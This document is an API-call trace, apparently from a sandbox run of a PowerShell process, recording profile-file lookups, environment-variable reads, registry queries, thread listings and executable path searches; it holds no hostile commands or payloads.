	[0847.143] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d960 | out: lpFileInformation=0x14d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0847.143] SetErrorMode (uMode=0x1) returned 0x1
	[0847.143] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14d750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0847.143] SetErrorMode (uMode=0x1) returned 0x1
	[0847.143] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d960 | out: lpFileInformation=0x14d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0847.144] SetErrorMode (uMode=0x1) returned 0x1
	[0847.144] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14d750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0847.144] SetErrorMode (uMode=0x1) returned 0x1
	[0847.144] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14d960 | out: lpFileInformation=0x14d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0847.144] SetErrorMode (uMode=0x1) returned 0x1
	[0847.145] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0847.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.145] CoTaskMemFree (pv=0x24c520) 
	[0847.145] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0847.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.145] CoTaskMemFree (pv=0x24c520) 
	[0847.985] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0847.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.988] CoTaskMemFree (pv=0x24c520) 
	[0847.989] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0847.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.989] CoTaskMemFree (pv=0x24c520) 
	[0847.990] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0847.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.990] CoTaskMemFree (pv=0x24c520) 
	[0847.991] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0847.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.991] CoTaskMemFree (pv=0x24c520) 
	[0847.992] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0847.992] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x14db40 | out: lpMode=0x14db40) returned 1
	[0847.993] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0847.993] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.993] CoTaskMemFree (pv=0x24c520) 
	[0847.995] SetEvent (hEvent=0x31c) returned 1
	[0847.996] SetEvent (hEvent=0x2f4) returned 1
	[0847.996] SetEvent (hEvent=0x2fc) returned 1
	[0847.996] SetEvent (hEvent=0x390) returned 1
	[0847.997] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0847.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.998] CoTaskMemFree (pv=0x24c520) 
	[0847.998] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d898 | out: phkResult=0x14d898*=0x348) returned 0x0
	[0847.998] RegQueryValueExW (in: hKey=0x348, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x14d81c, lpData=0x0, lpcbData=0x14d818*=0x0 | out: lpType=0x14d81c*=0x0, lpData=0x0, lpcbData=0x14d818*=0x0) returned 0x2

Thread:
	id = 879
	os_tid = 0x1688


Thread:
	id = 894
	os_tid = 0xc8c


Thread:
	id = 1198
	os_tid = 0x1ae0


Thread:
	id = 1200
	os_tid = 0x1338


Thread:
	id = 1234
	os_tid = 0x12b8


Thread:
	id = 1277
	os_tid = 0x1cd0


Thread:
	id = 1278
	os_tid = 0x1cd4

	[0649.101] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0783.129] LocalFree (hMem=0x197180) returned 0x0
	[0783.130] LocalFree (hMem=0x197290) returned 0x0
	[0783.130] CloseHandle (hObject=0x30c) returned 1
	[0783.130] CloseHandle (hObject=0x13) returned 1
	[0783.131] CloseHandle (hObject=0xf) returned 1
	[0783.131] RegCloseKey (hKey=0x2fc) returned 0x0
	[0783.131] RegCloseKey (hKey=0x2f8) returned 0x0
	[0783.132] RegCloseKey (hKey=0x2f4) returned 0x0
	[0784.772] RegCloseKey (hKey=0x2f4) returned 0x0
	[0797.032] RegCloseKey (hKey=0x2f4) returned 0x0
	[0831.630] RegCloseKey (hKey=0x388) returned 0x0
	[0831.631] RegCloseKey (hKey=0x364) returned 0x0
	[0831.631] RegCloseKey (hKey=0x3a0) returned 0x0
	[0831.631] RegCloseKey (hKey=0x380) returned 0x0
	[0831.632] RegCloseKey (hKey=0x37c) returned 0x0
	[0831.632] RegCloseKey (hKey=0x378) returned 0x0
	[0831.632] RegCloseKey (hKey=0x374) returned 0x0
	[0831.632] RegCloseKey (hKey=0x370) returned 0x0
	[0831.633] RegCloseKey (hKey=0x36c) returned 0x0
	[0831.633] RegCloseKey (hKey=0x368) returned 0x0
	[0831.633] RegCloseKey (hKey=0x340) returned 0x0
	[0831.633] RegCloseKey (hKey=0x39c) returned 0x0
	[0831.634] RegCloseKey (hKey=0x398) returned 0x0
	[0831.634] RegCloseKey (hKey=0x360) returned 0x0
	[0831.634] RegCloseKey (hKey=0x35c) returned 0x0
	[0831.634] RegCloseKey (hKey=0x358) returned 0x0
	[0831.635] RegCloseKey (hKey=0x354) returned 0x0
	[0831.635] RegCloseKey (hKey=0x350) returned 0x0
	[0831.635] RegCloseKey (hKey=0x34c) returned 0x0
	[0831.635] RegCloseKey (hKey=0x348) returned 0x0
	[0831.636] RegCloseKey (hKey=0x344) returned 0x0
	[0831.636] RegCloseKey (hKey=0x394) returned 0x0
	[0831.636] RegCloseKey (hKey=0x334) returned 0x0
	[0831.636] RegCloseKey (hKey=0x330) returned 0x0
	[0831.637] RegCloseKey (hKey=0x32c) returned 0x0
	[0831.637] RegCloseKey (hKey=0x328) returned 0x0
	[0831.637] RegCloseKey (hKey=0x324) returned 0x0
	[0831.637] RegCloseKey (hKey=0x320) returned 0x0
	[0831.638] RegCloseKey (hKey=0x318) returned 0x0
	[0831.638] RegCloseKey (hKey=0x31c) returned 0x0
	[0831.638] RegCloseKey (hKey=0x390) returned 0x0
	[0831.638] RegCloseKey (hKey=0x2fc) returned 0x0
	[0831.638] RegCloseKey (hKey=0x2f4) returned 0x0
	[0831.639] RegCloseKey (hKey=0x38c) returned 0x0
	[0871.338] RegCloseKey (hKey=0x348) returned 0x0

Thread:
	id = 1298
	os_tid = 0x1d54


Thread:
	id = 1808
	os_tid = 0x1f30

	[0848.916] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0848.921] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0848.926] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0848.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.926] CoTaskMemFree (pv=0x24c520) 
	[0848.928] VirtualQuery (in: lpAddress=0x1c91d800, lpBuffer=0x1c91e6c0, dwLength=0x30 | out: lpBuffer=0x1c91e6c0*(BaseAddress=0x1c91d000, AllocationBase=0x1bf90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0848.931] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0848.931] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.931] CoTaskMemFree (pv=0x24c520) 
	[0848.934] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0848.934] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.934] CoTaskMemFree (pv=0x24c520) 
	[0848.937] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0848.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.937] CoTaskMemFree (pv=0x24c520) 
	[0849.887] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0849.887] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0849.887] CoTaskMemFree (pv=0x24c520) 
	[0849.890] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0849.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0849.890] CoTaskMemFree (pv=0x24c520) 
	[0849.892] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0849.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0849.894] CoTaskMemFree (pv=0x24c520) 
	[0849.900] VirtualQuery (in: lpAddress=0x1c91dab0, lpBuffer=0x1c91e970, dwLength=0x30 | out: lpBuffer=0x1c91e970*(BaseAddress=0x1c91d000, AllocationBase=0x1bf90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0849.901] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0849.901] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0849.901] CoTaskMemFree (pv=0x24c520) 
	[0849.904] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0849.904] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0849.904] CoTaskMemFree (pv=0x24c520) 
	[0849.904] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0849.904] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0849.904] CoTaskMemFree (pv=0x24c520) 
	[0849.906] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0849.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0849.906] CoTaskMemFree (pv=0x24c520) 
	[0849.910] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0849.910] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0849.911] CoTaskMemFree (pv=0x24c520) 
	[0853.818] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0853.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0853.818] CoTaskMemFree (pv=0x24c520) 
	[0853.820] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0853.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0853.820] CoTaskMemFree (pv=0x24c520) 
	[0853.822] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0853.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0853.822] CoTaskMemFree (pv=0x24c520) 
	[0853.825] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0853.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0853.825] CoTaskMemFree (pv=0x24c520) 
	[0853.826] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0853.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0853.826] CoTaskMemFree (pv=0x24c520) 
	[0853.828] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0853.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0853.828] CoTaskMemFree (pv=0x24c520) 
	[0853.830] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0853.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0853.830] CoTaskMemFree (pv=0x24c520) 
	[0853.852] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0853.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0853.852] CoTaskMemFree (pv=0x24c520) 
	[0856.165] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0856.165] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0856.165] CoTaskMemFree (pv=0x24c520) 
	[0856.168] CoTaskMemAlloc (cb=0x104) returned 0x24c520
	[0856.168] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x24c520, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0856.168] CoTaskMemFree (pv=0x24c520) 
	[0856.168] CoTaskMemAlloc (cb=0x128) returned 0x24dec0
	[0856.168] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x24dec0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0856.168] CoTaskMemFree (pv=0x24dec0) 
	[0856.173] CoTaskMemAlloc (cb=0x20e) returned 0x1ba44370
	[0856.173] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1ba44370 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0856.173] CoTaskMemFree (pv=0x1ba44370) 
	[0856.177] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0856.189] SetErrorMode (uMode=0x1) returned 0x1
	[0856.192] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0857.672] SetErrorMode (uMode=0x1) returned 0x1
	[0857.673] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0857.673] SetErrorMode (uMode=0x1) returned 0x1
	[0857.673] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0859.424] SetErrorMode (uMode=0x1) returned 0x1
	[0859.425] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0859.426] SetErrorMode (uMode=0x1) returned 0x1
	[0859.426] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0861.362] SetErrorMode (uMode=0x1) returned 0x1
	[0861.363] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0861.364] SetErrorMode (uMode=0x1) returned 0x1
	[0861.364] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0861.372] SetErrorMode (uMode=0x1) returned 0x1
	[0861.375] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0861.376] SetErrorMode (uMode=0x1) returned 0x1
	[0861.376] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0861.384] SetErrorMode (uMode=0x1) returned 0x1
	[0861.385] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0861.386] SetErrorMode (uMode=0x1) returned 0x1
	[0861.386] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0862.395] SetErrorMode (uMode=0x1) returned 0x1
	[0862.396] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0862.396] SetErrorMode (uMode=0x1) returned 0x1
	[0862.397] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0863.987] SetErrorMode (uMode=0x1) returned 0x1
	[0863.990] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0863.990] SetErrorMode (uMode=0x1) returned 0x1
	[0863.991] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0865.418] SetErrorMode (uMode=0x1) returned 0x1
	[0865.419] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0865.419] SetErrorMode (uMode=0x1) returned 0x1
	[0865.419] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0865.427] SetErrorMode (uMode=0x1) returned 0x1
	[0865.429] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0865.429] SetErrorMode (uMode=0x1) returned 0x1
	[0865.429] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0865.437] SetErrorMode (uMode=0x1) returned 0x1
	[0865.438] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0865.438] SetErrorMode (uMode=0x1) returned 0x1
	[0865.439] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
